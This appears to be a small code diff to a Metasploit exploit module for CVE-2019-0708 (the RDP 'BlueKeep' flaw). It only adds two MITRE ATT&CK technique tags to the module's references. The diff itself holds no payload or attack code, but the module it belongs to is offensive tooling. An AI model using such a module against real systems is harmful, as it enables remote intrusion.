@@ -93,7 +93,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2019-0708'],
           ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
-          ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html']
+          ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html'],
+          ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
+          ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION]
         ],
         'DefaultOptions' => {
           'RDP_CLIENT_NAME' => 'ethdev',
